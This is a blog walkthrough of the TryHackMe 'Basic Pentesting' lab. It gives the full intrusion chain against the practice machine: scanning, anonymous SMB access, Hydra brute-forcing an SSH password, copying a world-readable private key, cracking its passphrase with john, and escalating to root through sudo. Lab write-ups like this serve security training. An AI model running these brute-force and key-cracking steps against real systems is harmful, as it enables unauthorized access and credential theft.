TryHackMe – Basic Pentesting

https://tryhackme.com/room/basicpentestingjt

Note, any passwords have been redacted out only the process is shown below.

Enumeration

Port Scan (nmap)

This room has no text walkthrough and just a list of questions to answer, so it will be a good test of what we have learned so far!

First we need to do a port scan to see what ports we can uncover: nmap -sV -v 10.10.163.73.

Directory Scan (Gobuster)

We have uncovered a webserver at port 80. Now we can fire up gobuster (or dirbuster) and enumerate for any interesting directories: gobuster dir -u 10.10.163.73 -w /usr/share/wordlists/dirb/common.txt

Directory Browse

Gobuster did find one: /development. There are two files here, dev.txt:

2018-04-23: I’ve been messing with that struts stuff, and it’s pretty cool! I think it might be neat to host that on this server too. Haven’t made any real web apps yet, but I have tried that example you get to show off how it works (and it’s the REST version of the example!). Oh, and right now I’m using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

and j.txt:

For J:

I’ve been auditing the contents of /etc/shadow to make sure we don’t have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K

So know that we know that there are at least two users “j” and “k”, “J” has a weak and easily crackable password, SMB is setup, and we are using apache 2.5.12 (different from what nmap discovered).

We could look to see if there are any exploits for this version, which there is one: Apache Struts 2.5 < 2.512 RCE.

SMB Browse

We also know there is an SMB share, I ran smbclient -L 10.10.163.73 and see there is an Anonymous share name we could access with no username and pass:

smbclient //10.10.163.73/Anonymous -u anonymous

We logged in successfully!

# see directory listing
smb: \\> l
  .                                   D        0  Thu Apr 19 13:31:20 2018
  ..                                  D        0  Thu Apr 19 13:13:06 2018
  staff.txt                           N      173  Thu Apr 19 13:29:55 2018

There is an intersting file named staff.txt here! I tried to print staff.txt but we did not have permission. We will instead have to try to download the file on our local machine. Let’s exit the smbclient. Now we know this file is right in the root of the Anonymous share so lets run:

smbget -U anonymous smb://10.10.163.73/Anonymous/staff.txt

And voila! We have the staff.txt file! Let’s read it:

cat staff.txt                                                                                1 ⚙
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Alright! So now we know the two users from the /development directory are most likely Jan and Kay. We could get lucky and they are just using these as their usernames! Let’s save them to our compendium just in case.

Password Bruteforcing (Hydra)

We can now boot up Hydra and try to brute force the password for jan, since we know it is weak and already cracked before:

hydra -t 5 -l jan -P /usr/share/wordlists/rockyou.txt -vV 10.10.163.73 ssh

After several minutes (fortunately the password was in the top 1000 of rockyou.txt), we got the password! Let’s add this back to our compendium and we can now SSH in!

Gain Access (SSH)

Now that we have access, let’s see what all we can do.

# first let's see where we are
jan@basic2:~$ pwd
/home/jan
# okay, good we are in jan's home folder.
# I will also cd .. and run ls -l see who owns the folder
jan@basic2:/home$ ls -l
total 8
drwxr-xr-x 2 root root 4096 Apr 23  2018 jan
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 kay

Unfortunately, Jan does not even own her own home folder (root does), which eliminates my plans to try to download a LinEnum script into her home folder to run. We will have to check out some hotspots manually:

# first, let's check crontab and see if there are any user tasks
# running as sudo we could exploit
jan@basic2:/home$ cat /etc/crontab
# at the very end we just see a #, whcih means there are no custom jobs

# now let's check important files such as /etc/passwd and /etc/shadow
# I just ls'd the directory but used grep to only grab those two
# file names
jan@basic2:/home$ ls -l /etc | grep 'passwd\\|shadow'
-rw-r----- 1 root shadow   673 Apr 19  2018 gshadow
-rw------- 1 root root     665 Apr 19  2018 gshadow-
-rw-r--r-- 1 root root    1639 Apr 23  2018 passwd
-rw------- 1 root root    1602 Apr 19  2018 passwd-
-rw-r----- 1 root shadow  1085 Apr 23  2018 shadow
-rw------- 1 root root     963 Apr 19  2018 shadow-

Interestingly, everyone has read permissions on /etc/passwd! we can cat /etc/passwd to see if there is anything else useful. We do at least see the user kay in here in the file. We can also run cat /etc/group and see what memberships we have.

Here we can see kay is a member of several admin groups! Gaining access to her account would grant us much higher access. Let’s check out her home folder and see if there is anything there for us:

jan@basic2:~$ cd /home/kay
# now lets check for files
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo

On first thought, we see a pass.bak file. However our user does not have read permissions for it, so it is no use. If we look at the .ssh directory, we are allowed to read it! Let’s cd in and see what we have:

jan@basic2:/home/kay$ cd .ssh
# look at the files
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

Well that’s not good! For Kay, at least. We can access her id_rsa file! With this, we can copy its’s contents and login via her using the ssh command! Run cat id_rsa and copy all of this to a file on your local machine named id_rsa.

Now we can exit our ssh as jan and be back in our own terminal. One of the other issues with this id_rsa file is that it’s encrypted with AES-128-CBC. So even if we try to use it, it will ask us for a passphrase and we do not yet know it. We can use a script called ssh2john to try and crack the encryption on the key:

# on kali it is installed already in the listed directory
# otherwise you can wget the script from above and run it that way
# this will output the file into a format john the ripper can decode
┌──(kali㉿kali)-[~/thm]
└─$ python /usr/share/john/ssh2john.py /home/kali/thm/id_rsa > crack.txt

# now we can run john the ripper on it for the passphrase
┌──(kali㉿kali)-[~/thm]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
-redacted-          (/home/kali/thm/id_rsa)

Great, now we know the passphrase for the id_rsa key! Let’s use this to login.

┌──(kali㉿kali)-[~/thm]
└─$ ssh -i "/home/kali/thm/id_rsa"  [email protected]                                             1 ⚙
Enter passphrase for key '/home/kali/thm/id_rsa': 

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

We’re in!

Now if we remember from before, there was an interesting file in kay’s home directory named pass.bak. We are already logged into their home directory, so let’s just cat pass.bak. And now we have their actual password!

We can run sudo – l and insert their super long password, and we see that this user can run all commands as sudo!

kay@basic2:~$ sudo -l
[sudo] password for kay: 
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL

So let’s elevate even higher and run sudo /bin/bash. Now we have a terminal as root!

kay@basic2:~$ sudo /bin/bash
root@basic2:~# whoami
root

For our final step, let’s cd into roots home directory: cd /root and grab that flag! cat flag.txt

Machine Compendium

All the information about our target machine, I continually update this as we discover more info!

{
	"MACHINE_IP": "10.10.163.73",
	"MACHINE_INFO" : {
		"os": "Ubuntu Linux",
		"commonName": ""
	},
	"OPEN_PORTS": {
		"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4"],
		"80": ["http", "Apache httpd 2.4.18"],
		"139": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
		"445": ["netbios-ssn", "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"],
		"8009": "ajp13?",
		"8080": "http-proxy"
	},
	"CREDENTIALS":{
		
	},
	"OTHER_INFO": {
		"vulnerabilities": ['CVE 2017-9805 - Apache RCE'],
		"notable_web_dir": ["/development"]
	}
	
}

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *